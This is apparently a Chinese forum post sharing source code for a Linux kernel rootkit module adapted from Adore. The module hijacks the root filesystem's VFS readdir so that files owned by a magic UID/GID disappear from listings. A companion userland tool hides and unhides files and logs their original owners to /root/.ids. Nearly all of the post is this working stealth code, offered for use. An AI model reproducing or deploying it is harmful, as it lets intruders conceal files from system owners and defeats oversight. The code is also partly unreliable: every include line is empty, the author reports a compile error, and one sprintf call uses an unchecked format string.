隐藏文件有很多种,我这里不想用已经落伍的劫持系统调用以及LD_PRELOAD环境变量...还是用VFS吧...看代码吧...
想说下我这里的大概的思想思路,就是如果你想隐藏一个文件那么我就把它的uid和gid都变成一个不存在的值如下的ELITE_UID 和 ELITE_GID,内核态劫持vfs的readdir后判断uid和gid是不是ELITE_UID 和 ELITE_GID,是的话就可以隐藏文件了... 那么恢复文件的时候可以把uid和gid直接变成0 0 也就是root的就可以了... 可是如果你想恢复文件的时候还是保存其原有的属性呢...麻烦点我也做了看后面的代码.
hide.h
[code]
#define ELITE_UID 6666
#define ELITE_GID 8888
[/code]
hide.c
[code]
#include
#include
#include
#include
#include "hide.h"
void help(char* pro)
{
printf("Usage: %s {h,u,} [file]\n\n"
" h hide file\n"
" u unhide file\n", pro);
}
int hidefile(char *path)
{
return lchown(path, ELITE_UID, ELITE_GID);
}
int unhidefile(char *path)
{
return lchown(path, 0, 0);
}
int main(int argc, char* argv[])
{
if (argc != 3 )
{
help(argv[0]);
return -1;
}
if(*argv[1]=='h')
hidefile(argv[2]);
else if(*argv[1]=='u')
unhidefile(argv[2]);
return 0;
}
[/code]
kernel.c
[code]
#ifndef __KERNEL__
#define __KERNEL__
#endif
#ifndef MODULE
#define MODULE
#endif
#define LINUX26
#ifdef MODVERSIONS
#include
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "hide.h"
char *root_fs = "/"; /* default FS to hide files */
typedef int (*readdir_t)(struct file *, void *, filldir_t);
readdir_t orig_root_readdir=NULL;
struct dentry *(*orig_proc_lookup)(struct inode *, struct dentry *,
struct nameidata *) = NULL;
filldir_t root_filldir = NULL;
struct super_block *root_sb[1024];
int adore_root_filldir(void *buf, const char *name, int nlen, loff_t off, ino_t ino, unsigned x)
{
struct inode *inode = NULL;
int r = 0;
uid_t uid;
gid_t gid;
char reiser = 0;
if (!root_sb[current->pid % 1024])
return 0;
/* Theres an odd 2.6 behaivior. iget() crashes on ReiserFS! using iget_locked
* without the unlock_new_inode() doesnt crash, but deadlocks
* time to time. So I basically emulate iget() without
* the sb->s_op->read_inode(inode); and so it doesnt crash or deadlock.
*/
reiser = (strcmp(root_sb[current->pid % 1024]->s_type->name, "reiserfs") == 0);
if (reiser) {
if ((inode = iget_locked(root_sb[current->pid % 1024], ino)) == NULL)
return 0;
} else {
if ((inode = iget(root_sb[current->pid % 1024], ino)) == NULL)
return 0;
}
uid = inode->i_uid;
gid = inode->i_gid;
if (reiser) {
if (inode->i_state & I_NEW)
unlock_new_inode(inode);
}
iput(inode);
/* Is it hidden ? */
if (uid == ELITE_UID && gid == ELITE_GID) {
r = 0;
} else if (root_filldir) {
r = root_filldir(buf, name, nlen, off, ino, x);
}
return r;
}
int adore_root_readdir(struct file *fp, void *buf, filldir_t filldir)
{
int r = 0;
if (!fp || !fp->f_vfsmnt || !fp->f_vfsmnt->mnt_sb || !buf ||
!filldir || !orig_root_readdir)
return 0;
root_filldir = filldir;
root_sb[current->pid % 1024] = fp->f_vfsmnt->mnt_sb;
r = orig_root_readdir(fp, buf, adore_root_filldir);
return r;
}
int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
struct file *filep;
filep = filp_open(p, O_RDONLY|O_DIRECTORY, 0);
if (IS_ERR(filep)) {
return -1;
}
if (orig_readdir)
*orig_readdir = filep->f_op->readdir;
((struct file_operations *)(filep->f_op))->readdir =new_readdir;
filp_close(filep, 0);
return 0;
}
int unpatch_vfs(const char *p, readdir_t orig_readdir)
{
struct file *filep;
filep = filp_open(p, O_RDONLY|O_DIRECTORY, 0);
if (IS_ERR(filep)) {
return -1;
}
((struct file_operations *)(filep->f_op))->readdir = orig_readdir;
filp_close(filep, 0);
return 0;
}
static int __init adore_init(void)
{
patch_vfs(root_fs, &orig_root_readdir, adore_root_readdir);
printk("%s\n", "patch vfs ok");
return 0;
}
static void __exit adore_cleanup(void)
{
unpatch_vfs(root_fs, orig_root_readdir);
printk("%s\n", "unpatch vfs ok");
}
module_init(adore_init);
module_exit(adore_cleanup);
[/code]
[code]
KERNELBUILD := /lib/modules/$(shell uname -r)/build
obj-m += kernel.o
default: adore
adore:
make -C $(KERNELBUILD) M=$(shell pwd) modules
clean:
rm -f *.ko *.o hide
rm -f *mod* Module*
[/code]
上面的就可以完成文件隐藏了...内核编译的时候r = orig_root_readdir(fp, buf, adore_root_filldir);这里居然报错...我看了下内核源码也没有发现声明错误,也不知道为什么,希望大家帮看下
那么要是能够恢复之前的属性呢? 可以将属性保存在内核态...但是在内核态的话,内存就必须一直占有着,所以我这里以文件的形式保存在用户态了....不过大家要是知道有什么删除文件里某一行的好办法的话,可以告知我.... sed这些除外^_^ 尝试了下mmap,mmap可以修改但是不能删除... 最后用了vi的方法,就是先读取整个文件到内存,删除某几个后在写回了文件
[code]
#include
#include
#include
#include
#include
#include
#include "hide.h"
typedef struct list
{
char line[MAX_LEN];
struct list* next;
}LIST;
void help(char* pro)
{
printf("Usage: %s {h,u,} [file]\n\n"
" h hide file\n"
" u unhide file\n", pro);
}
void init_list(LIST** L)
{
*L = (LIST*)malloc(sizeof(LIST));
(*L)->next = NULL;
}
void add_list(LIST* L, char* line)
{
LIST* p = (LIST*)malloc(sizeof(LIST));
sprintf(p->line, line);
p->next = L->next;
L->next = p;
}
void print_list(LIST* L)
{
LIST* p = L->next;
while(p!=NULL)
{
printf("%s", p->line);
p = p->next;
}
}
int hidefile(char *path)
{
struct stat buf;
int ret = 0;
FILE* fp = NULL;
OWN* file = (OWN*)malloc(sizeof(OWN));
if(file == NULL)
{
printf("%s\n", "malloc error");
return -1;
}
if(lstat(path, &buf)==-1)
return -1;
file->uid = buf.st_uid;
file->gid = buf.st_gid;
file->filename = path;
ret = lchown(path, ELITE_UID, ELITE_GID);
if(ret==0)
{
fp = fopen(ID_FILE, "a+");
if(fp == NULL)
{
printf("%s\n", "fopen() error");
return -1;
}
fprintf(fp , "%s\t%d\t%d\n", file->filename, file->uid, file->gid);
fclose(fp);
}
free(file);
file=NULL;
return ret;
}
int unhidefile(char *path)
{
int ret = -1;
OWN* file = NULL;
FILE* fp = NULL;
LIST* L = NULL;
LIST* p = NULL;
LIST* q = NULL;
char buf[MAX_LEN];
fp = fopen(ID_FILE, "r");
if(fp == NULL)
{
printf("%s\n", "fopen() error");
goto out;
}
init_list(&L);
while(fgets(buf, MAX_LEN, fp)!=NULL)
add_list(L, buf);
print_list(L);
p = L;
q = p->next;
file = (OWN*)malloc(sizeof(OWN));
if(file == NULL)
{
printf("%s\n", "malloc error");
goto out;
}
file->filename = (char*)malloc(MAX_LEN);
while(q!=NULL)
{
sscanf(q->line, "%s\t%d\t%d\n", file->filename, &(file->uid), &(file->gid));
if(strcmp(path ,file->filename)==0)
{
printf("find %s\n", file->filename);
break;
}
p = q;
q = q->next;
}
if(q == NULL)
{
printf("%s is not by me\n", path);
ret = -1;
goto out;
}
else
{
p->next = q->next;
}
printf("%s\n", "after");
print_list(L);
fclose(fp);
ret = lchown(file->filename, file->uid, file->gid);
printf("%s\n", "begin write");
fp = fopen(ID_FILE, "w");
p = L->next;
while(p!=NULL)
{
q = p;
printf("%s", p->line);
fprintf(fp, "%s", p->line);
p = p->next;
free(q);
}
free(L);
out:
free(file);
file = NULL;
fclose(fp);
return ret;
}
int main(int argc, char* argv[])
{
if (argc != 3 )
{
help(argv[0]);
return -1;
}
if(*argv[1]=='h')
hidefile(argv[2]);
else if(*argv[1]=='u')
unhidefile(argv[2]);
return 0;
}
[/code]
hide.h也要修改为
[code]
#ifndef HIDE_H
#define HIDE_H
#define ELITE_UID 6666
#define ELITE_GID 8888
#define MAX_LEN 100
#define ID_FILE "/root/.ids"
typedef struct file_own
{
unsigned int uid;
unsigned int gid;
char* filename;
}OWN;
#endif
[/code]
好了大致就这么多了,在2.6.18上测试通过了,可以隐藏文件和目录,并可以恢复文件属性
看的不爽的话,参考我的cu的帖子